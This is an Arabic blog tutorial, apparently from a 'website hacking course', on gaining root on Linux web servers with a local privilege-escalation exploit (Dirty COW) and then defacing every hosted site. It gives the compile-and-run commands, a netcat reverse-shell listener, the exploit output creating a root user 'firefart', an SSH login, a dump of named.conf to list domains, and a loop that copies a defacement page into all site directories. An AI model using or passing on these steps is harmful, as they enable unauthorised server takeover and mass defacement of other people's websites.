شرح اختراق جميع المواقع التي على السيرفر عبر لوكال روت local root

شرح اختراق جميع المواقع  التي على السيرفر عبر لوكال روت local root
    السلام عليكم  و دائما في دورة اختراق المواقع اليوم معنا اهم شرح في الدورة و هو ترويت السيرفرات و اختراق جميع المواقع التي على السيرفر  و بعد ما شفنا طريقة اختراق جميع المواقع التي على سيرفر وندوز اليوم سوف نتعرف على طريقة اختراق جميع المواقع التي على السيرفر لينكس  طبعا فرق كبير جدا بين سيرفرات الوندوز و سيرفرات اللينكس ف سيرفرات لينكس صعبة جدا في اختراقها و الحصول على صلحيات ال root  للحصول على لوكال مناسب للسيرفر الدي تريد اختراقه سوف اقدم لكم احد الادوات الرائعة و التي تبحث لك على اللوكال المناسب للسيرفر بدون اي تدخل منك  و هادا شرح لها  و بعد ان تجد لوكال مناسب للسيرفر  دائما ما يكون اللوكل ب سيغة c مثال  local.c 
    في بعض اللوكلات تجد طريقة ترجمة اللوكال و ادا لم تجده ف كل ما عليك فعله هو ان تقوم ب هده الترجمة  
    gcc local.c -o local 
    في بعض السيرفات و التي لا تكون لك فيها صلحيات لا يمكنك ان تقوم ب ترجمة الثغرة في السيرفر 
    لهادا قم ب ترجمة الثغرة على جهازك 
    و بعد ترجمة الثغرة نقوم ب اعطائها الصلاحيات عبر chmod 
    chmod +x local  
    و بعدها القيام ب عمل تشغيل ل الوكال عبر 
    ./local 
      في بعض المرات قد يتطلب ان تنتضر نصف ساعة كاملة لاكتمال 
    و ادا كان لديك سيرفر من 2016 او تحته فهادا سهل جدا كل ما عليك القيام به هو تحميل هده الثغرة 
    بعد تحميلك للثغرة قم ب حفضها ب اسم dirty.c و قم برفعها على السيرفر او قم ب ترجمتها على جهازك  و بعدها قم برفعها و الان قم ب عمل اتصال عكسي على السيرفر 
    في بعض الاحيان لن تستطيع الاتصال ب السيرفر من الشل بل تحتاج الى سكربت البيرل او باش و ساشرح هده الطريقة في القريب العاجل المهم نكمل الشرح
    قم بعمل اتصال عكسي عبر هادا الامر 
    nc -lvp 21
    قم ب تغيير البورت 21 الى اي بورت تريده
    و كما نرى في الصورة فانه قد تم الاتصال ب السيرفر ب مجاح و الان سوف ندخل الى مجلد الدي يوجد به اللوكال روت 
    بعد الاتصال ب السيرفر   قم ب ترجمة الثغرة  عبر هادا الامر 
    gcc -pthread dirty.c -o dirty -lcrypt
     و الان سوف نقوم ب اعطائها التصريح عبر امر 
    chmod +x dirty 
    و كما نرى في الصورة فيانه قد تم ترجمة الثغرة و اعطائها التصاريح و لم يبقى لنا سوى ان نقوم نقوم ب تشغيل الوكال روت 
    لتشغيل الثغرة 
    ./dirty
    في حالة ما ضهر لك هادا الخطء الدي في هده الصورة   و معه هده الرسالة 
    File /tmp/passwd.bak already exists! Please delete it and run again
    فهادا يعني انه قد تم تجربة الثغرة على هادا السيرفر هل هادا يعني لا يمكننا ان نقوم ب ترويته !!! 
    لالا سوف نقوم ب حدف ملف /tmp/passwd.bak  عبر هادا الامر 
    rm /tmp/passwd.bak
    و قم ب اعدة تشغيل الثغرة 
    و الان سوف يضهر لك ان تدخل كلمة سر  سوف نختار على سبيل المثال  123456123
    و سوف تستغرق هده العملية بعض الوقت من 10 دقائق الى 20 دقيقة 
    و كما نرى في الصورة ف انه قد انتهى 
    و كما نرى في الرسالة 
    /etc/passwd successfully backed up to /tmp/passwd.bak
    Complete line:
    firefart:fiT.MfhrH0uoo:0:0:pwned:/root:/bin/bash
    mmap: 7fa12ebf1000
    ptrace 0
    Done! Check /etc/passwd to see if the new user was created.
    You can log in with the username 'firefart' and the password '123456123'.
    DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
     و الان لنعرف انه قد تم اضافة root في السيرفر نقوم ب عرض ملف /etc/passwd عبر هادا الامر 
    cat /etc/passwd
    كما نرى في الصورة فانه تم اضافة root ب اسم firefart
    و الان للدخول الى الروت هناك  ان استطعت نقل ملف /tmp/passwd.bak الى etc/passwd عبر الامر 
    mv /tmp/passwd.bak /etc/passwd
     الان  تقوم ب الدخول من الترمنال عبر امر 
    su firefart
    و هده في الكثير من الاحيان لن تنجح معك كما نرى في الصورة 
    و الان سوف نقوم ب التسجيل في ال ssh 
    قم ب فتح الترمنال و كتابة هادا الامر 
    ssh firefart@127.0.0.1
    مع تغيير 127.0.0.1 الى ايبي السيرفر  
    كما نرى في الصورة 
    و كما نرى ف انه قد تم الاتصال ب ال ssh بكل نجاح طبعا كلمة السر هي 123456123 و الان لنعرف صلحياتنا على السيرفر نقوم ب اعطئه امر id 
    و كما نرى في الصورة ف ان صلاحياتنا على السييرفر هي روت و يمكننا ان نقوم ب اي شيء في السيرفر حتى اطفائه و لكن شرحنا اليوم هو اختراق جميع مواقع السيرفر 
    في البداية يجب ان نقوم ب ر فع اندكس الاختراق في السيرفر او رفعه في اي موقع و تنزيله عبر امر wget انا سوف ارفع الاندكس من الشل 
    و كما نرى ف ان اسم الاندكس هو sa.html 
    و المسار هو 
     /home/adoc11/public_html/__/ 
    سوف نقوم ب الدخول الى مسار الاندكس عبر امر 
    cd  /home/adoc11/public_html/__/ 
    من ثم نقل الاندكس الى ملف ال home عبر هادا الامر 
    mv index.html /home/
    و كما هو موضح في الصورة 
     الدهاب الى ملف ال home و هادا عبر الامر 
    cd /home/
    و الان سوف نقوم ب سحب ملف ال named.conf و الدي توجد به جميع الدومينات 
    امر السحب 
    cat /etc/named.conf > dns.txt
     و الان قد تم سحب جميع اسماء النطاقات و وضعها في ملف  اسمه dns.txt و الان سوف نقوم ب الدهب الى هادا الموقع ل استخراج جميع الدومينات 
    رابط الموقع اضغط هنا   وبعد ان قمنا ب استخراج جميع الدومينات لم يبقى لنا الى نقل الاندكس الى جميع المواقع التي على السيرفر ب هادا الامر 
    for i in $(find . -type d -maxdepth 2); do cp -n sa.html $i/sa.html ; done
    مع تغيير sa.html الى اسم الاندكس الخاص بك 
    و كما نرى في الصورة قد تم تغغير جميع اندكسات المواقع 
    و الان لمشاهدة الشرح ب الفيديو 

    إرسال تعليق

    اعلان